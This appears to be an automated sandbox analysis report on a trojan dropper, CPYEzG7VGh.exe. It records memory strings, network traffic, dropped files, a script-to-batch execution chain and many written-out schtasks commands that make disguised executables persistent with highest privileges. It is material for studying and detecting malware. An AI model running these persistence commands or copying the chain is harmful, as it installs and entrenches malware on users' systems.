Source: Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://timeweb.com/ru/services/dedicated-server/
Source: Memory Compression.exe, 00000024.00000002.2240602993.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126A1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002794000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://timeweb.com/ru/services/dedicated-server/data-centers/
Source: Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://timeweb.com/ru/services/domains/
Source: Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://timeweb.com/ru/services/hosting/
Source: Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://timeweb.com/ru/services/vds/
Source: Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://timeweb.com/ru/solutions/
Source: Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126A1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://timeweb.com/ru/support/documents/
Source: Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126A1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://timeweb.com/ru/support/faq/
Source: Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://timeweb.com/ru/templateshop/
Source: Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/Timeweb
Source: Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vds.timeweb.ru/login
Source: Memory Compression.exe, 00000024.00000002.2240602993.000000000275E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vh438.timeweb.ru
Source: Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vh438.timeweb.ru(
Source: Memory Compression.exe, 00000024.00000002.2240602993.000000000275E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vh438.timeweb.ru/parking/?ref=cy08450.tw1.ru&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKN
Source: Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/timewebru
Source: Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wm.timeweb.ru/login
Source: Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit
Source: Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.instagram.com/accounts/login/?next=/timeweb.ru/
Source: Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/channel/UCTSnrzx_YKQOzTR1Y6OxxSQ

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown

HTTPS traffic detected: 185.114.245.123:443 -> 192.168.2.5:49705 version: TLS 1.2

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe

Code function: 0_2_0037718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_0037718C

Source: C:\surrogateserverreviewsession\Agentserver.exe	File created: C:\Windows\Offline Web Pages\uXGucUKOPdf.exe	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	File created: C:\Windows\Offline Web Pages\d5489f5e5451db	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	File created: C:\Windows\Containers\serviced\uXGucUKOPdf.exe	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	File created: C:\Windows\Containers\serviced\d5489f5e5451db	Jump to behavior

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0037857B	0_2_0037857B
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0039D00E	0_2_0039D00E
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0037407E	0_2_0037407E
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_003870BF	0_2_003870BF
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_003A1194	0_2_003A1194
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0037E2A0	0_2_0037E2A0
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_00373281	0_2_00373281
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_003902F6	0_2_003902F6
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_00386646	0_2_00386646
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0039473A	0_2_0039473A
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0039070E	0_2_0039070E
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_003727E8	0_2_003727E8
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_003837C1	0_2_003837C1
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0037E8A0	0_2_0037E8A0
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_00394969	0_2_00394969
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0037F968	0_2_0037F968
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_00383A3C	0_2_00383A3C
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_00386A7B	0_2_00386A7B
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0039CB60	0_2_0039CB60
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_00390B43	0_2_00390B43
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_00385C77	0_2_00385C77
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0037ED14	0_2_0037ED14
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_00383D6D	0_2_00383D6D
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0038FDFA	0_2_0038FDFA
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0037BE13	0_2_0037BE13
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0037DE6C	0_2_0037DE6C
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_00375F3C	0_2_00375F3C
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_00390F78	0_2_00390F78

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: String function: 0038E360 appears 52 times
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: String function: 0038ED00 appears 31 times
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: String function: 0038E28C appears 35 times

Source: Agentserver.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: uXGucUKOPdf.exe.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: dasHost.exe.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: CPYEzG7VGh.exe, 00000000.00000003.2027784746.0000000006BFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs CPYEzG7VGh.exe
Source: CPYEzG7VGh.exe, 00000000.00000003.2028775027.0000000005566000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs CPYEzG7VGh.exe
Source: CPYEzG7VGh.exe, 00000000.00000003.2029092772.0000000005560000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs CPYEzG7VGh.exe
Source: CPYEzG7VGh.exe	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs CPYEzG7VGh.exe

Source: CPYEzG7VGh.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, rDEqSbpCFNNQ5oxsLLj.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, rDEqSbpCFNNQ5oxsLLj.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, HEb6cqvsWBdvRqy7bNc.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, HEb6cqvsWBdvRqy7bNc.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, rDEqSbpCFNNQ5oxsLLj.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, rDEqSbpCFNNQ5oxsLLj.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, HEb6cqvsWBdvRqy7bNc.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, HEb6cqvsWBdvRqy7bNc.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, pTi4iXH0XRL95pcJLR8.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.CPYEzG7VGh.exe.55c254d.1.raw.unpack, pTi4iXH0XRL95pcJLR8.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, pTi4iXH0XRL95pcJLR8.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.CPYEzG7VGh.exe.6c5a54d.0.raw.unpack, pTi4iXH0XRL95pcJLR8.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@46/26@4/1

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe

Code function: 0_2_00376EC9 GetLastError,FormatMessageW,

0_2_00376EC9

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe

Code function: 0_2_00389E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00389E1C

Source: C:\surrogateserverreviewsession\Agentserver.exe

File created: C:\Program Files\Windows Security\BrowserCore\en-US\uXGucUKOPdf.exe

Jump to behavior

Source: C:\surrogateserverreviewsession\Agentserver.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Agentserver.exe.log

Jump to behavior

Source: C:\surrogateserverreviewsession\dasHost.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3348:120:WilError_03
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\0d40980263d5142ec77208c8885d3e5b9bec9a3f
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2284:120:WilError_03

Source: C:\surrogateserverreviewsession\Agentserver.exe

File created: C:\Users\user\AppData\Local\Temp\HnPfnRVdev

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\surrogateserverreviewsession\cAWYZg0ZdjD2dKs6hjKja7TASB4qz.bat" "

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Command line argument: sfxname	0_2_0038D5D4
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Command line argument: sfxstime	0_2_0038D5D4
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Command line argument: STARTDLG	0_2_0038D5D4
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Command line argument: xj<	0_2_0038D5D4

Source: CPYEzG7VGh.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: CPYEzG7VGh.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\surrogateserverreviewsession\Agentserver.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: CPYEzG7VGh.exe

ReversingLabs: Detection: 76%

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe

File read: C:\Users\user\Desktop\CPYEzG7VGh.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\CPYEzG7VGh.exe "C:\Users\user\Desktop\CPYEzG7VGh.exe"
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\surrogateserverreviewsession\pmMvwz3lY7qlA.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\surrogateserverreviewsession\cAWYZg0ZdjD2dKs6hjKja7TASB4qz.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\surrogateserverreviewsession\Agentserver.exe "C:\surrogateserverreviewsession\Agentserver.exe"
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\uXGucUKOPdf.exe'" /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uXGucUKOPdf" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\uXGucUKOPdf.exe'" /rl HIGHEST /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\uXGucUKOPdf.exe'" /rl HIGHEST /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\uXGucUKOPdf.exe'" /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uXGucUKOPdf" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\RedistList\uXGucUKOPdf.exe'" /rl HIGHEST /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\uXGucUKOPdf.exe'" /rl HIGHEST /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 5 /tr "'C:\Recovery\uXGucUKOPdf.exe'" /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uXGucUKOPdf" /sc ONLOGON /tr "'C:\Recovery\uXGucUKOPdf.exe'" /rl HIGHEST /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 8 /tr "'C:\Recovery\uXGucUKOPdf.exe'" /rl HIGHEST /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 8 /tr "'C:\surrogateserverreviewsession\dasHost.exe'" /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dasHost" /sc ONLOGON /tr "'C:\surrogateserverreviewsession\dasHost.exe'" /rl HIGHEST /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 9 /tr "'C:\surrogateserverreviewsession\dasHost.exe'" /rl HIGHEST /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 9 /tr "'C:\Windows\Offline Web Pages\uXGucUKOPdf.exe'" /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uXGucUKOPdf" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\uXGucUKOPdf.exe'" /rl HIGHEST /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 5 /tr "'C:\Windows\Offline Web Pages\uXGucUKOPdf.exe'" /rl HIGHEST /f
